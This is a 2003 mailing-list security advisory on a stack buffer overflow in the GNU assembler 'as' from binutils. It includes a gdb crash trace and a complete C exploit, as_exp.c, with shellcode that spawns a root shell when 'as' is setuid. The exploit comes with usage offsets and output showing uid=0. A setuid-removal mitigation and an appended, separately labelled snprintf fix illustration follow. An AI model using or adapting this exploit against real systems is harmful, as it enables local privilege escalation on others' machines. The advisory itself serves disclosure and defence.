bug-gnu-utils

No System Security Advisory #1


From: CoKi
Subject: No System Security Advisory #1
Date: Tue, 19 Aug 2003 01:36:10 -0300
User-agent: KMail/1.5

-------------------------------------------------
No System Security Advisory #1 - 19/08/03
-------------------------------------------------
Program:  as - The GNU assembler
Homepage:  http://sources.redhat.com/binutils/
Vulnerable Versions: GNU binutils 2.14 and prior
Risk: Low / Medium
Impact: Stack Buffer Overflow
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
The GNU Binutils are a collection of binary tools.
'as' is the GNU assembler.

More information at: http://sources.redhat.com/binutils/


- DETAILS
-------------------------------------------------
$ /usr/bin/as `perl -e 'print "A" x 2005'`
Segmentation fault

Now we proceed to open gdb to view what may have occurred.

$ gdb /usr/bin/as
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 2005'`
Starting program: /usr/bin/as `perl -e 'print "A" x 2005'`
Assembler messages:
Error: can't open AAAAAAAAAAAAAAA..........AAAAA...
..........AAAAAAA for reading
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp            0x41414141       0x41414141
eip            0x41414141       0x41414141
esp            0xbffff090       0xbffff090
(gdb)

Here, as you can see, we are able to gain the return address.
Return : 0xbfffe890.


- EXPLOIT
-------------------------------------------------
I have done minimal testing on this.
It has been tested on Slackware 9.0 and Red Hat 7.2.

------------------- as_exp.c --------------------
/* Linux 'as' buffer overflow

   This will give you a root shell if /usr/bin/as is SUID,
   which isn't by default.

   Use: ./as_exp [offset]

   Try offsets 300-400
   Tested on Slackware 9.0 and Red Hat 7.2

   by CoKi <address@hidden>
   No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <stdlib.h>     /* atoi */
#include <string.h>     /* memcpy, strlen */
#include <unistd.h>     /* execlp */

#define OFFSET 350
#define BUFLEN 2005     /* length of the argument that crashes 'as' */

long esp(void);

int main(int argc, char *argv[]) {

  /* +4 so that the last 4-byte store in the fill loop below stays inside the array */
  char buf[BUFLEN + 4];
  char shellcode[]=
    "\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
    "\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
  int i, off;
  long ret;

  if(argc>1) {
    off = atoi(argv[1]);
  }

  else off = OFFSET;

  /* guessed address inside the argument, relative to our own stack pointer */
  ret = (esp() - off);
  printf("\n'as' buffer overflow by CoKi\n");
  printf("----------------------------\n\n");
  printf("Return Address: 0x%lx\nOffset: %d\n\n", ret, off);

  /* fill the argument with NOPs (0x90) so an imprecise guess still lands in the sled */
  for(i=0;i<BUFLEN;i+=4)
    *(unsigned long *)&buf[i]=0x90909090;

  /* the last two words of the argument replace the saved ebp and return address */
  *(unsigned long *)&buf[BUFLEN - 4]=ret;
  *(unsigned long *)&buf[BUFLEN - 8]=ret;

  /* shellcode sits directly below those two words */
  memcpy(buf + BUFLEN - strlen(shellcode) - 8, shellcode, strlen(shellcode));
  buf[BUFLEN] = '\0';   /* terminate the argument string */
  execlp("/usr/bin/as","as",buf,(char *)NULL);
  return 0;
}

/* returns the current stack pointer; relies on 32-bit x86 and on the
   compiler leaving %eax as the function's return value */
long esp(void){
  __asm__("movl %esp,%eax");
}
------------------- as_exp.c --------------------

$ gcc -o as_exp as_exp.c
$ ./as_exp 390

'as' buffer overflow by CoKi
----------------------------

Return Address: 0xbffff002
Offset: 390

Assembler messages:
Error: can't open ............
.................../bin/sh ..... for reading

sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users)
sh-2.05b#

This will give you a root shell if /usr/bin/as is SUID, which isn't by
default.


- SOLUTIONS
-------------------------------------------------
Remove suid permissions on the program if it has them.

# chmod u-s /usr/bin/as


- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-01.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <address@hidden>

No System Group - http://www.nosystem.com.ar
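The DETAILS section shows the symptom (saved ebp and eip replaced by 0x41414141 after a 2005-byte file name) and SOLUTIONS shows the setuid mitigation. The following added example, not code from CoKi's post or from binutils, sketches the bug class at the source level: an unchecked name formatted into a fixed-size stack buffer, beside the bounded form a code fix would use. The function names and MSG_SIZE are assumptions chosen for this illustration.

```c
/* Added illustration, not code from CoKi's post or from binutils: the bug
 * class the advisory demonstrates (an unchecked file name written into a
 * fixed-size stack buffer) next to the bounded form a fix would use.
 * Function names and MSG_SIZE are assumptions chosen for this example. */
#include <stdio.h>
#include <string.h>

#define MSG_SIZE 256

/* Vulnerable pattern: nothing bounds the write, so a name longer than msg
 * overwrites the saved ebp and return address, which is what the 0x41414141
 * values in the gdb session show. Kept for comparison only; never called. */
void report_unreadable_unsafe(const char *name)
{
    char msg[MSG_SIZE];
    sprintf(msg, "can't open %s for reading", name);   /* unbounded write */
    fputs(msg, stderr);
}

/* Bounded form: snprintf writes at most msg_size bytes (NUL included), and
 * the caller learns whether the name was cut. Returns 1 on truncation. */
int report_unreadable(const char *name, char *msg, size_t msg_size)
{
    int n = snprintf(msg, msg_size, "can't open %s for reading", name);
    return n < 0 || (size_t)n >= msg_size;
}

/* Replays the advisory's 2005-byte name (constructed here) against the
 * bounded form. Returns 1 when the message is truncated, not overflowed. */
int check_long_name(void)
{
    char name[2006], msg[MSG_SIZE];
    memset(name, 'A', 2005);
    name[2005] = '\0';
    return report_unreadable(name, msg, sizeof msg) == 1
        && strlen(msg) == MSG_SIZE - 1;
}

/* A normal name passes through unchanged. Returns 1 on success. */
int check_short_name(void)
{
    char msg[MSG_SIZE];
    return report_unreadable("foo.s", msg, sizeof msg) == 0
        && strcmp(msg, "can't open foo.s for reading") == 0;
}
```

Removing the setuid bit, as the SOLUTIONS section says, removes the privilege gain; the bounded write above removes the crash itself.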



